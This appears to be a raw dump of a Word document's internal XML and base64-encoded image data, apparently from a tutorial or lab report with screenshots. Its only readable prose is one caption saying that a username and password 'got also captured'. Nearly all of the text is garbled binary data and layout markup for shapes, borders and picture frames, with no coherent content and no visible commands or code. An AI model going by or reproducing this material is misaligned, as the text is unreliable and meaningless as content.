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P2UadLdAwAAHgoAAA4AAAAAAAAAAAAAAAAAPQIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0ACgAAAAAAAAAhAGRqIr1QTwEAUE8BABQAAAAAAAAAAAAAAAAARgYAAGRycy9t&#10;ZWRpYS9pbWFnZTEuanBnUEsBAi0AFAAGAAgAAAAhAGChPUndAAAABQEAAA8AAAAAAAAAAAAAAAAA&#10;yFUBAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3ncEYugAAACEBAAAZAAAAAAAAAAAA&#10;AAAAANJWAQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAAMNXAQAAAA==&#10;">
                <v:rect id="Rectangle 3164" o:spid="_x0000_s1244" style="position:absolute;left:59192;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51094493" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3185" o:spid="_x0000_s1245"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hoxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq96cYWS0hdJQiiR03t/Zl9zYZm34bdrYn+elco9DjMzDfMcj3aTlzIh9axgvksA0Fc&#10;O91yo+D0uZ3mIEJE1tg5JgVXCrBePU2WWGg38JEuVWxEgnAoUIGJsS+kDLUhi2HmeuLkfTtvMSbp&#10;G6k9DgluO/maZe/SYstpwWBPG0P1T/VrFZyz801uDua0W/gvmw+l3paVVurleSw/QEQa43/4r73X&#10;Ct7m+QIeb9ITkKs7AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAD6fmGjEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId76" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3186" o:spid="_x0000_s1246"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xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8IS9aVoVKV2jyOouHrUKsrdH82yLzUtpsrb+eyMIHoeZ+YZZrHpTixu1rrKsIB5HIIhz&#10;qysuFJyOP6MEhPPIGmvLpOBODlbLj8ECU207PtAt84UIEHYpKii9b1IpXV6SQTe2DXHwLrY16INs&#10;C6lb7ALc1HISRXNpsOKwUGJD3yXl1+zfKNh2k7P/2/9ek/hidTMrNjzdH5X6HPbrLxCeev8Ov9o7&#10;rWAaJ3N4vglPQC4fAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE2BUj/EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AA1A34"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05344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="199D5C64" wp14:editId="44EE17C2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40792" name="Group 4079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20" name="Shape 498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21" name="Shape 498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22" name="Shape 498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23" name="Shape 498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24" name="Shape 498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792" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49825" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49826" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49827" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49828" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4982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06368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D12467D" wp14:editId="41272185">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40793" name="Group 4079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30" name="Shape 498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31" name="Shape 498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32" name="Shape 498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33" name="Shape 498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34" name="Shape 498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793" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49835" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49836" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49837" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49838" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 498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you can see that username and password got also captured </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC1ED2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="153DCBC1" wp14:editId="7EBE55D2">
                <wp:extent cx="5986577" cy="3550053"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40791" name="Group 40791"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3550053"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3550053"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3168" name="Rectangle 3168"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236260"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="560A0F8F"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169" name="Rectangle 3169"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3400853"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3A86190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188" name="Picture 3188"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId77"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3189" name="Shape 3189"/>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3DCBC1" id="Group 40791" o:spid="_x0000_s1247" style="width:471.4pt;height:279.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,35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xTR9/AMAAPELAAAOAAAAZHJzL2Uyb0RvYy54bWzMVm1v2zYQ/j5g&#10;/0HQ98ayZTmyEKcYmjUoMKxB2/0AmqIsYRRJkPTbfv3ujqLs2umyZUC3AJH5cjw+9/De7t4eepns&#10;hHWdVqt0epOliVBc153arNLfvrx/U6aJ80zVTGolVulRuPTt/Y8/3O1NJWa61bIWNgElylV7s0pb&#10;7001mTjeip65G22Egs1G2555mNrNpLZsD9p7OZll2WKy17Y2VnPhHKw+hM30nvQ3jeD+Y9M44RO5&#10;SgGbp6+l7xq/k/s7Vm0sM23HBxjsFSh61im4dFT1wDxLtra7UtV33GqnG3/DdT/RTdNxQTaANdPs&#10;wppHq7eGbNlU+40ZaQJqL3h6tVr+6+7Rms/myQITe7MBLmiGthwa2+MvoEwORNlxpEwcfMJhsViW&#10;i+L2Nk047OVFkWVFHkjlLTB/dY63P79wchIvnnwFZ2/AQdyJA/fvOPjcMiOIWlcBB0826WowYLoA&#10;f1WsB0/9BL7D1EaKhFaJHpIdyXKVA96eYapYzuflDNwNOZnli9licLSRtaLI4SLkbLos5/kCKRsN&#10;Z5Wxzj8K3Sc4WKUWoJB3sd0vzgfRKILXS4Vfpd93UoZdXAH+IkIc+cP6QEZOszleh2trXR/B9Fbb&#10;Pz5CEDdS71epHkYpxjXcjrtpIj8ooBxDKA5sHKzjwHr5TlOgBTw/bb1uOgJ8um0ABm8ZMHyPR10+&#10;+6jLSAM4wMuPOjznPMvK6OL/k+csoh3/9XOajlfwP+QpGF3F6Mv5HE75rRXpoKT/Wzp6Zn/fmjeQ&#10;Ug3z3bqTnT9SeYCoQVBq99RxDFWcnId7OYY7COC9EOywBuERJfEcxhTOv1Kzlp3BgENXx/EAGGrL&#10;RW5+xuaQ9x803/ZC+VDIrJCAXSvXdsalia1EvxaQk+yHeoqAWOW8FZ63OGzgYkxQiOxsg1CegCHm&#10;b6SovMyznBLUdHabXaan8ja/LcDhKamD4DIjH3tthiJYAQgNAdd3i/1yjH1K+fi+/yzuZ8ViYOqK&#10;peVyemJptsyvWOLbkMfxyWLuhh6hDlkc1to44gcVh5jt/7JdAR/Hc6gUhwnk7KIcsLRQcfIABfd7&#10;SOZfNEn6Uy2OEsF7TjJSncuOOrGKDTrDiSgXfw3pPpcnqsBdokT8DZIhlV7KcKmdCBegWeTZo6mg&#10;65xMqdDqWQHZGLyUQePYQPRQjYSeSdUR51Bsgu9RPfRHKZAPqT6JBuoh9DBTOufsZv1O2mTHsILR&#10;H4YdGQGieCZE3XAq++YpFGXStGzQNagZLiCVgyaUFNSljmAGtXxAE1pVaPjAztiwAqTxEMHSyo/n&#10;FbTZdOG